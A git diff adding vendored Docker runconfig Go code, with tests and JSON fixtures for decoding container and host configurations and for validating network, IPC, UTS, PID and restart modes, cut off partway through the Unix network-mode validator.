0000000000..f1f9de5950 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/config_test.go @@ -0,0 +1,139 @@ +package runconfig + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/strslice" +) + +type f struct { + file string + entrypoint strslice.StrSlice +} + +func TestDecodeContainerConfig(t *testing.T) { + + var ( + fixtures []f + image string + ) + + //TODO: Should run for Solaris + if runtime.GOOS == "solaris" { + t.Skip() + } + + if runtime.GOOS != "windows" { + image = "ubuntu" + fixtures = []f{ + {"fixtures/unix/container_config_1_14.json", strslice.StrSlice{}}, + {"fixtures/unix/container_config_1_17.json", strslice.StrSlice{"bash"}}, + {"fixtures/unix/container_config_1_19.json", strslice.StrSlice{"bash"}}, + } + } else { + image = "windows" + fixtures = []f{ + {"fixtures/windows/container_config_1_19.json", strslice.StrSlice{"cmd"}}, + } + } + + for _, f := range fixtures { + b, err := ioutil.ReadFile(f.file) + if err != nil { + t.Fatal(err) + } + + c, h, _, err := DecodeContainerConfig(bytes.NewReader(b)) + if err != nil { + t.Fatal(fmt.Errorf("Error parsing %s: %v", f, err)) + } + + if c.Image != image { + t.Fatalf("Expected %s image, found %s\n", image, c.Image) + } + + if len(c.Entrypoint) != len(f.entrypoint) { + t.Fatalf("Expected %v, found %v\n", f.entrypoint, c.Entrypoint) + } + + if h != nil && h.Memory != 1000 { + t.Fatalf("Expected memory to be 1000, found %d\n", h.Memory) + } + } +} + +// TestDecodeContainerConfigIsolation validates isolation passed +// to the daemon in the hostConfig structure. Note this is platform specific +// as to what level of container isolation is supported. +func TestDecodeContainerConfigIsolation(t *testing.T) { + + // An invalid isolation level + if _, _, _, err := callDecodeContainerConfigIsolation("invalid"); err != nil { + if !strings.Contains(err.Error(), `invalid --isolation: "invalid"`) { + t.Fatal(err) + } + } + + // Blank isolation (== default) + if _, _, _, err := callDecodeContainerConfigIsolation(""); err != nil { + t.Fatal("Blank isolation should have succeeded") + } + + // Default isolation + if _, _, _, err := callDecodeContainerConfigIsolation("default"); err != nil { + t.Fatal("default isolation should have succeeded") + } + + // Process isolation (Valid on Windows only) + if runtime.GOOS == "windows" { + if _, _, _, err := callDecodeContainerConfigIsolation("process"); err != nil { + t.Fatal("process isolation should have succeeded") + } + } else { + if _, _, _, err := callDecodeContainerConfigIsolation("process"); err != nil { + if !strings.Contains(err.Error(), `invalid --isolation: "process"`) { + t.Fatal(err) + } + } + } + + // Hyper-V Containers isolation (Valid on Windows only) + if runtime.GOOS == "windows" { + if _, _, _, err := callDecodeContainerConfigIsolation("hyperv"); err != nil { + t.Fatal("hyperv isolation should have succeeded") + } + } else { + if _, _, _, err := callDecodeContainerConfigIsolation("hyperv"); err != nil { + if !strings.Contains(err.Error(), `invalid --isolation: "hyperv"`) { + t.Fatal(err) + } + } + } +} + +// callDecodeContainerConfigIsolation is a utility function to call +// DecodeContainerConfig for validating isolation +func callDecodeContainerConfigIsolation(isolation string) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { + var ( + b []byte + err error + ) + w := ContainerConfigWrapper{ + Config: &container.Config{}, + HostConfig: &container.HostConfig{ + NetworkMode: "none", + Isolation: container.Isolation(isolation)}, + } + if b, err = json.Marshal(w); err != nil { + return nil, nil, nil, fmt.Errorf("Error on marshal %s", err.Error()) + } + return DecodeContainerConfig(bytes.NewReader(b)) +} diff --git a/vendor/github.com/docker/docker/runconfig/config_unix.go b/vendor/github.com/docker/docker/runconfig/config_unix.go new file mode 100644 index 0000000000..4ccfc73be2 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/config_unix.go @@ -0,0 +1,59 @@ +// +build !windows + +package runconfig + +import ( + "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" +) + +// ContainerConfigWrapper is a Config wrapper that holds the container Config (portable) +// and the corresponding HostConfig (non-portable). +type ContainerConfigWrapper struct { + *container.Config + InnerHostConfig *container.HostConfig `json:"HostConfig,omitempty"` + Cpuset string `json:",omitempty"` // Deprecated. Exported for backwards compatibility. + NetworkingConfig *networktypes.NetworkingConfig `json:"NetworkingConfig,omitempty"` + *container.HostConfig // Deprecated. Exported to read attributes from json that are not in the inner host config structure. +} + +// getHostConfig gets the HostConfig of the Config. +// It's mostly there to handle Deprecated fields of the ContainerConfigWrapper +func (w *ContainerConfigWrapper) getHostConfig() *container.HostConfig { + hc := w.HostConfig + + if hc == nil && w.InnerHostConfig != nil { + hc = w.InnerHostConfig + } else if w.InnerHostConfig != nil { + if hc.Memory != 0 && w.InnerHostConfig.Memory == 0 { + w.InnerHostConfig.Memory = hc.Memory + } + if hc.MemorySwap != 0 && w.InnerHostConfig.MemorySwap == 0 { + w.InnerHostConfig.MemorySwap = hc.MemorySwap + } + if hc.CPUShares != 0 && w.InnerHostConfig.CPUShares == 0 { + w.InnerHostConfig.CPUShares = hc.CPUShares + } + if hc.CpusetCpus != "" && w.InnerHostConfig.CpusetCpus == "" { + w.InnerHostConfig.CpusetCpus = hc.CpusetCpus + } + + if hc.VolumeDriver != "" && w.InnerHostConfig.VolumeDriver == "" { + w.InnerHostConfig.VolumeDriver = hc.VolumeDriver + } + + hc = w.InnerHostConfig + } + + if hc != nil { + if w.Cpuset != "" && hc.CpusetCpus == "" { + hc.CpusetCpus = w.Cpuset + } + } + + // Make sure NetworkMode has an acceptable value. We do this to ensure + // backwards compatible API behavior. + hc = SetDefaultNetModeIfBlank(hc) + + return hc +} diff --git a/vendor/github.com/docker/docker/runconfig/config_windows.go b/vendor/github.com/docker/docker/runconfig/config_windows.go new file mode 100644 index 0000000000..f2361b554b --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/config_windows.go @@ -0,0 +1,19 @@ +package runconfig + +import ( + "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" +) + +// ContainerConfigWrapper is a Config wrapper that holds the container Config (portable) +// and the corresponding HostConfig (non-portable). +type ContainerConfigWrapper struct { + *container.Config + HostConfig *container.HostConfig `json:"HostConfig,omitempty"` + NetworkingConfig *networktypes.NetworkingConfig `json:"NetworkingConfig,omitempty"` +} + +// getHostConfig gets the HostConfig of the Config. +func (w *ContainerConfigWrapper) getHostConfig() *container.HostConfig { + return w.HostConfig +} diff --git a/vendor/github.com/docker/docker/runconfig/errors.go b/vendor/github.com/docker/docker/runconfig/errors.go new file mode 100644 index 0000000000..bb72c1699c --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/errors.go @@ -0,0 +1,46 @@ +package runconfig + +import ( + "fmt" + + "github.com/docker/docker/api/errors" +) + +var ( + // ErrConflictContainerNetworkAndLinks conflict between --net=container and links + ErrConflictContainerNetworkAndLinks = fmt.Errorf("Conflicting options: container type network can't be used with links. This would result in undefined behavior") + // ErrConflictUserDefinedNetworkAndLinks conflict between --net= and links + ErrConflictUserDefinedNetworkAndLinks = fmt.Errorf("Conflicting options: networking can't be used with links. This would result in undefined behavior") + // ErrConflictSharedNetwork conflict between private and other networks + ErrConflictSharedNetwork = fmt.Errorf("Container sharing network namespace with another container or host cannot be connected to any other network") + // ErrConflictHostNetwork conflict from being disconnected from host network or connected to host network. + ErrConflictHostNetwork = fmt.Errorf("Container cannot be disconnected from host network or connected to host network") + // ErrConflictNoNetwork conflict between private and other networks + ErrConflictNoNetwork = fmt.Errorf("Container cannot be connected to multiple networks with one of the networks in private (none) mode") + // ErrConflictNetworkAndDNS conflict between --dns and the network mode + ErrConflictNetworkAndDNS = fmt.Errorf("Conflicting options: dns and the network mode") + // ErrConflictNetworkHostname conflict between the hostname and the network mode + ErrConflictNetworkHostname = fmt.Errorf("Conflicting options: hostname and the network mode") + // ErrConflictHostNetworkAndLinks conflict between --net=host and links + ErrConflictHostNetworkAndLinks = fmt.Errorf("Conflicting options: host type networking can't be used with links. This would result in undefined behavior") + // ErrConflictContainerNetworkAndMac conflict between the mac address and the network mode + ErrConflictContainerNetworkAndMac = fmt.Errorf("Conflicting options: mac-address and the network mode") + // ErrConflictNetworkHosts conflict between add-host and the network mode + ErrConflictNetworkHosts = fmt.Errorf("Conflicting options: custom host-to-IP mapping and the network mode") + // ErrConflictNetworkPublishPorts conflict between the publish options and the network mode + ErrConflictNetworkPublishPorts = fmt.Errorf("Conflicting options: port publishing and the container type network mode") + // ErrConflictNetworkExposePorts conflict between the expose option and the network mode + ErrConflictNetworkExposePorts = fmt.Errorf("Conflicting options: port exposing and the container type network mode") + // ErrUnsupportedNetworkAndIP conflict between network mode and requested ip address + ErrUnsupportedNetworkAndIP = fmt.Errorf("User specified IP address is supported on user defined networks only") + // ErrUnsupportedNetworkNoSubnetAndIP conflict between network with no configured subnet and requested ip address + ErrUnsupportedNetworkNoSubnetAndIP = fmt.Errorf("User specified IP address is supported only when connecting to networks with user configured subnets") + // ErrUnsupportedNetworkAndAlias conflict between network mode and alias + ErrUnsupportedNetworkAndAlias = fmt.Errorf("Network-scoped alias is supported only for containers in user defined networks") + // ErrConflictUTSHostname conflict between the hostname and the UTS mode + ErrConflictUTSHostname = fmt.Errorf("Conflicting options: hostname and the UTS mode") +) + +func conflictError(err error) error { + return errors.NewRequestConflictError(err) +} diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_14.json b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_14.json new file mode 100644 index 0000000000..b08334c095 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_14.json @@ -0,0 +1,30 @@ +{ + "Hostname":"", + "Domainname": "", + "User":"", + "Memory": 1000, + "MemorySwap":0, + "CpuShares": 512, + "Cpuset": "0,1", + "AttachStdin":false, + "AttachStdout":true, + "AttachStderr":true, + "PortSpecs":null, + "Tty":false, + "OpenStdin":false, + "StdinOnce":false, + "Env":null, + "Cmd":[ + "bash" + ], + "Image":"ubuntu", + "Volumes":{ + "/tmp": {} + }, + "WorkingDir":"", + "NetworkDisabled": false, + "ExposedPorts":{ + "22/tcp": {} + }, + "RestartPolicy": { "Name": "always" } +} diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_17.json b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_17.json new file mode 100644 index 0000000000..0d780877b4 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_17.json @@ -0,0 +1,50 @@ +{ + "Hostname": "", + "Domainname": "", + "User": "", + "Memory": 1000, + "MemorySwap": 0, + "CpuShares": 512, + "Cpuset": "0,1", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Entrypoint": "bash", + "Image": "ubuntu", + "Volumes": { + "/tmp": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "SecurityOpt": [""], + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Links": ["redis3:redis"], + "LxcConf": {"lxc.utsname":"docker"}, + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsSearch": [""], + "DnsOptions": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [] + } +} diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_19.json b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_19.json new file mode 100644 index 0000000000..de49cf3242 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_19.json @@ -0,0 +1,58 @@ +{ + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Entrypoint": "bash", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "/tmp": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Links": ["redis3:redis"], + "LxcConf": {"lxc.utsname":"docker"}, + "Memory": 1000, + "MemorySwap": 0, + "CpuShares": 512, + "CpusetCpus": "0,1", + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsSearch": [""], + "DnsOptions": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [""], + "CgroupParent": "" + } +} diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_14.json b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_14.json new file mode 100644 index 0000000000..c72ac91cab --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_14.json @@ -0,0 +1,18 @@ +{ + "Binds": ["/tmp:/tmp"], + "ContainerIDFile": "", + "LxcConf": [], + "Privileged": false, + "PortBindings": { + "80/tcp": [ + { + "HostIp": "0.0.0.0", + "HostPort": "49153" + } + ] + }, + "Links": ["/name:alias"], + "PublishAllPorts": false, + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"] +} diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_19.json b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_19.json new file mode 100644 index 0000000000..5ca8aa7e19 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_19.json @@ -0,0 +1,30 @@ +{ + "Binds": ["/tmp:/tmp"], + "Links": ["redis3:redis"], + "LxcConf": {"lxc.utsname":"docker"}, + "Memory": 0, + "MemorySwap": 0, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpusetCpus": "0,1", + "CpusetMems": "0,1", + "BlkioWeight": 300, + "OomKillDisable": false, + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsSearch": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [""], + "CgroupParent": "" +} diff --git a/vendor/github.com/docker/docker/runconfig/fixtures/windows/container_config_1_19.json b/vendor/github.com/docker/docker/runconfig/fixtures/windows/container_config_1_19.json new file mode 100644 index 0000000000..724320c760 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/fixtures/windows/container_config_1_19.json @@ -0,0 +1,58 @@ +{ + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Entrypoint": "cmd", + "Image": "windows", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "c:/windows": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "HostConfig": { + "Binds": ["c:/windows:d:/tmp"], + "Links": ["redis3:redis"], + "LxcConf": {"lxc.utsname":"docker"}, + "Memory": 1000, + "MemorySwap": 0, + "CpuShares": 512, + "CpusetCpus": "0,1", + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsSearch": [""], + "DnsOptions": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "default", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [""], + "CgroupParent": "" + } +} diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig.go b/vendor/github.com/docker/docker/runconfig/hostconfig.go new file mode 100644 index 0000000000..2b81d02c20 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/hostconfig.go @@ -0,0 +1,35 @@ +package runconfig + +import ( + "encoding/json" + "io" + + "github.com/docker/docker/api/types/container" +) + +// DecodeHostConfig creates a HostConfig based on the specified Reader. +// It assumes the content of the reader will be JSON, and decodes it. +func DecodeHostConfig(src io.Reader) (*container.HostConfig, error) { + decoder := json.NewDecoder(src) + + var w ContainerConfigWrapper + if err := decoder.Decode(&w); err != nil { + return nil, err + } + + hc := w.getHostConfig() + return hc, nil +} + +// SetDefaultNetModeIfBlank changes the NetworkMode in a HostConfig structure +// to default if it is not populated. This ensures backwards compatibility after +// the validation of the network mode was moved from the docker CLI to the +// docker daemon. +func SetDefaultNetModeIfBlank(hc *container.HostConfig) *container.HostConfig { + if hc != nil { + if hc.NetworkMode == container.NetworkMode("") { + hc.NetworkMode = container.NetworkMode("default") + } + } + return hc +} diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go b/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go new file mode 100644 index 0000000000..83ad32ecc7 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go @@ -0,0 +1,41 @@ +package runconfig + +import ( + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/pkg/sysinfo" +) + +// DefaultDaemonNetworkMode returns the default network stack the daemon should +// use. +func DefaultDaemonNetworkMode() container.NetworkMode { + return container.NetworkMode("bridge") +} + +// IsPreDefinedNetwork indicates if a network is predefined by the daemon +func IsPreDefinedNetwork(network string) bool { + return false +} + +// ValidateNetMode ensures that the various combinations of requested +// network settings are valid. +func ValidateNetMode(c *container.Config, hc *container.HostConfig) error { + // We may not be passed a host config, such as in the case of docker commit + return nil +} + +// ValidateIsolation performs platform specific validation of the +// isolation level in the hostconfig structure. +// This setting is currently discarded for Solaris so this is a no-op. +func ValidateIsolation(hc *container.HostConfig) error { + return nil +} + +// ValidateQoS performs platform specific validation of the QoS settings +func ValidateQoS(hc *container.HostConfig) error { + return nil +} + +// ValidateResources performs platform specific validation of the resource settings +func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error { + return nil +} diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_test.go b/vendor/github.com/docker/docker/runconfig/hostconfig_test.go new file mode 100644 index 0000000000..a6a2b34fc1 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/hostconfig_test.go @@ -0,0 +1,283 @@ +// +build !windows + +package runconfig + +import ( + "bytes" + "fmt" + "io/ioutil" + "testing" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/pkg/sysinfo" +) + +// TODO Windows: This will need addressing for a Windows daemon. +func TestNetworkModeTest(t *testing.T) { + networkModes := map[container.NetworkMode][]bool{ + // private, bridge, host, container, none, default + "": {true, false, false, false, false, false}, + "something:weird": {true, false, false, false, false, false}, + "bridge": {true, true, false, false, false, false}, + DefaultDaemonNetworkMode(): {true, true, false, false, false, false}, + "host": {false, false, true, false, false, false}, + "container:name": {false, false, false, true, false, false}, + "none": {true, false, false, false, true, false}, + "default": {true, false, false, false, false, true}, + } + networkModeNames := map[container.NetworkMode]string{ + "": "", + "something:weird": "something:weird", + "bridge": "bridge", + DefaultDaemonNetworkMode(): "bridge", + "host": "host", + "container:name": "container", + "none": "none", + "default": "default", + } + for networkMode, state := range networkModes { + if networkMode.IsPrivate() != state[0] { + t.Fatalf("NetworkMode.IsPrivate for %v should have been %v but was %v", networkMode, state[0], networkMode.IsPrivate()) + } + if networkMode.IsBridge() != state[1] { + t.Fatalf("NetworkMode.IsBridge for %v should have been %v but was %v", networkMode, state[1], networkMode.IsBridge()) + } + if networkMode.IsHost() != state[2] { + t.Fatalf("NetworkMode.IsHost for %v should have been %v but was %v", networkMode, state[2], networkMode.IsHost()) + } + if networkMode.IsContainer() != state[3] { + t.Fatalf("NetworkMode.IsContainer for %v should have been %v but was %v", networkMode, state[3], networkMode.IsContainer()) + } + if networkMode.IsNone() != state[4] { + t.Fatalf("NetworkMode.IsNone for %v should have been %v but was %v", networkMode, state[4], networkMode.IsNone()) + } + if networkMode.IsDefault() != state[5] { + t.Fatalf("NetworkMode.IsDefault for %v should have been %v but was %v", networkMode, state[5], networkMode.IsDefault()) + } + if networkMode.NetworkName() != networkModeNames[networkMode] { + t.Fatalf("Expected name %v, got %v", networkModeNames[networkMode], networkMode.NetworkName()) + } + } +} + +func TestIpcModeTest(t *testing.T) { + ipcModes := map[container.IpcMode][]bool{ + // private, host, container, valid + "": {true, false, false, true}, + "something:weird": {true, false, false, false}, + ":weird": {true, false, false, true}, + "host": {false, true, false, true}, + "container:name": {false, false, true, true}, + "container:name:something": {false, false, true, false}, + "container:": {false, false, true, false}, + } + for ipcMode, state := range ipcModes { + if ipcMode.IsPrivate() != state[0] { + t.Fatalf("IpcMode.IsPrivate for %v should have been %v but was %v", ipcMode, state[0], ipcMode.IsPrivate()) + } + if ipcMode.IsHost() != state[1] { + t.Fatalf("IpcMode.IsHost for %v should have been %v but was %v", ipcMode, state[1], ipcMode.IsHost()) + } + if ipcMode.IsContainer() != state[2] { + t.Fatalf("IpcMode.IsContainer for %v should have been %v but was %v", ipcMode, state[2], ipcMode.IsContainer()) + } + if ipcMode.Valid() != state[3] { + t.Fatalf("IpcMode.Valid for %v should have been %v but was %v", ipcMode, state[3], ipcMode.Valid()) + } + } + containerIpcModes := map[container.IpcMode]string{ + "": "", + "something": "", + "something:weird": "weird", + "container": "", + "container:": "", + "container:name": "name", + "container:name1:name2": "name1:name2", + } + for ipcMode, container := range containerIpcModes { + if ipcMode.Container() != container { + t.Fatalf("Expected %v for %v but was %v", container, ipcMode, ipcMode.Container()) + } + } +} + +func TestUTSModeTest(t *testing.T) { + utsModes := map[container.UTSMode][]bool{ + // private, host, valid + "": {true, false, true}, + "something:weird": {true, false, false}, + "host": {false, true, true}, + "host:name": {true, false, true}, + } + for utsMode, state := range utsModes { + if utsMode.IsPrivate() != state[0] { + t.Fatalf("UtsMode.IsPrivate for %v should have been %v but was %v", utsMode, state[0], utsMode.IsPrivate()) + } + if utsMode.IsHost() != state[1] { + t.Fatalf("UtsMode.IsHost for %v should have been %v but was %v", utsMode, state[1], utsMode.IsHost()) + } + if utsMode.Valid() != state[2] { + t.Fatalf("UtsMode.Valid for %v should have been %v but was %v", utsMode, state[2], utsMode.Valid()) + } + } +} + +func TestUsernsModeTest(t *testing.T) { + usrensMode := map[container.UsernsMode][]bool{ + // private, host, valid + "": {true, false, true}, + "something:weird": {true, false, false}, + "host": {false, true, true}, + "host:name": {true, false, true}, + } + for usernsMode, state := range usrensMode { + if usernsMode.IsPrivate() != state[0] { + t.Fatalf("UsernsMode.IsPrivate for %v should have been %v but was %v", usernsMode, state[0], usernsMode.IsPrivate()) + } + if usernsMode.IsHost() != state[1] { + t.Fatalf("UsernsMode.IsHost for %v should have been %v but was %v", usernsMode, state[1], usernsMode.IsHost()) + } + if usernsMode.Valid() != state[2] { + t.Fatalf("UsernsMode.Valid for %v should have been %v but was %v", usernsMode, state[2], usernsMode.Valid()) + } + } +} + +func TestPidModeTest(t *testing.T) { + pidModes := map[container.PidMode][]bool{ + // private, host, valid + "": {true, false, true}, + "something:weird": {true, false, false}, + "host": {false, true, true}, + "host:name": {true, false, true}, + } + for pidMode, state := range pidModes { + if pidMode.IsPrivate() != state[0] { + t.Fatalf("PidMode.IsPrivate for %v should have been %v but was %v", pidMode, state[0], pidMode.IsPrivate()) + } + if pidMode.IsHost() != state[1] { + t.Fatalf("PidMode.IsHost for %v should have been %v but was %v", pidMode, state[1], pidMode.IsHost()) + } + if pidMode.Valid() != state[2] { + t.Fatalf("PidMode.Valid for %v should have been %v but was %v", pidMode, state[2], pidMode.Valid()) + } + } +} + +func TestRestartPolicy(t *testing.T) { + restartPolicies := map[container.RestartPolicy][]bool{ + // none, always, failure + container.RestartPolicy{}: {true, false, false}, + container.RestartPolicy{"something", 0}: {false, false, false}, + container.RestartPolicy{"no", 0}: {true, false, false}, + container.RestartPolicy{"always", 0}: {false, true, false}, + container.RestartPolicy{"on-failure", 0}: {false, false, true}, + } + for restartPolicy, state := range restartPolicies { + if restartPolicy.IsNone() != state[0] { + t.Fatalf("RestartPolicy.IsNone for %v should have been %v but was %v", restartPolicy, state[0], restartPolicy.IsNone()) + } + if restartPolicy.IsAlways() != state[1] { + t.Fatalf("RestartPolicy.IsAlways for %v should have been %v but was %v", restartPolicy, state[1], restartPolicy.IsAlways()) + } + if restartPolicy.IsOnFailure() != state[2] { + t.Fatalf("RestartPolicy.IsOnFailure for %v should have been %v but was %v", restartPolicy, state[2], restartPolicy.IsOnFailure()) + } + } +} +func TestDecodeHostConfig(t *testing.T) { + fixtures := []struct { + file string + }{ + {"fixtures/unix/container_hostconfig_1_14.json"}, + {"fixtures/unix/container_hostconfig_1_19.json"}, + } + + for _, f := range fixtures { + b, err := ioutil.ReadFile(f.file) + if err != nil { + t.Fatal(err) + } + + c, err := DecodeHostConfig(bytes.NewReader(b)) + if err != nil { + t.Fatal(fmt.Errorf("Error parsing %s: %v", f, err)) + } + + if c.Privileged != false { + t.Fatalf("Expected privileged false, found %v\n", c.Privileged) + } + + if l := len(c.Binds); l != 1 { + t.Fatalf("Expected 1 bind, found %d\n", l) + } + + if len(c.CapAdd) != 1 && c.CapAdd[0] != "NET_ADMIN" { + t.Fatalf("Expected CapAdd NET_ADMIN, got %v", c.CapAdd) + } + + if len(c.CapDrop) != 1 && c.CapDrop[0] != "NET_ADMIN" { + t.Fatalf("Expected CapDrop MKNOD, got %v", c.CapDrop) + } + } +} + +func TestValidateResources(t *testing.T) { + type resourceTest struct { + ConfigCPURealtimePeriod int64 + ConfigCPURealtimeRuntime int64 + SysInfoCPURealtimePeriod bool + SysInfoCPURealtimeRuntime bool + ErrorExpected bool + FailureMsg string + } + + tests := []resourceTest{ + { + ConfigCPURealtimePeriod: 1000, + ConfigCPURealtimeRuntime: 1000, + SysInfoCPURealtimePeriod: true, + SysInfoCPURealtimeRuntime: true, + ErrorExpected: false, + FailureMsg: "Expected valid configuration", + }, + { + ConfigCPURealtimePeriod: 5000, + ConfigCPURealtimeRuntime: 5000, + SysInfoCPURealtimePeriod: false, + SysInfoCPURealtimeRuntime: true, + ErrorExpected: true, + FailureMsg: "Expected failure when cpu-rt-period is set but kernel doesn't support it", + }, + { + ConfigCPURealtimePeriod: 5000, + ConfigCPURealtimeRuntime: 5000, + SysInfoCPURealtimePeriod: true, + SysInfoCPURealtimeRuntime: false, + ErrorExpected: true, + FailureMsg: "Expected failure when cpu-rt-runtime is set but kernel doesn't support it", + }, + { + ConfigCPURealtimePeriod: 5000, + ConfigCPURealtimeRuntime: 10000, + SysInfoCPURealtimePeriod: true, + SysInfoCPURealtimeRuntime: false, + ErrorExpected: true, + FailureMsg: "Expected failure when cpu-rt-runtime is greater than cpu-rt-period", + }, + } + + for _, rt := range tests { + var hc container.HostConfig + hc.Resources.CPURealtimePeriod = rt.ConfigCPURealtimePeriod + hc.Resources.CPURealtimeRuntime = rt.ConfigCPURealtimeRuntime + + var si sysinfo.SysInfo + si.CPURealtimePeriod = rt.SysInfoCPURealtimePeriod + si.CPURealtimeRuntime = rt.SysInfoCPURealtimeRuntime + + if err := ValidateResources(&hc, &si); (err != nil) != rt.ErrorExpected { + t.Fatal(rt.FailureMsg, err) + } + } +} diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go b/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go new file mode 100644 index 0000000000..6e2b7f5ff7 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go @@ -0,0 +1,129 @@ +// +build !windows,!solaris + +package runconfig + +import ( + "fmt" + "runtime" + "strings" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/pkg/sysinfo" +) + +// DefaultDaemonNetworkMode returns the default network stack the daemon should +// use. +func DefaultDaemonNetworkMode() container.NetworkMode { + return container.NetworkMode("bridge") +} + +// IsPreDefinedNetwork indicates if a network is predefined by the daemon +func IsPreDefinedNetwork(network string) bool { + n := container.NetworkMode(network) + return n.IsBridge() || n.IsHost() || n.IsNone() || n.IsDefault() || network == "ingress" +} + +// ValidateNetMode ensures that the various combinations of requested +// network settings are valid. +func ValidateNetMode(c *container.Config, hc *container.HostConfig) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + parts := strings.Split(string(hc.NetworkMode), ":") + if parts[0] == "container" { + if len(parts) < 2 || parts[1] == "" { + return fmt.Errorf("--net: invalid net mode: 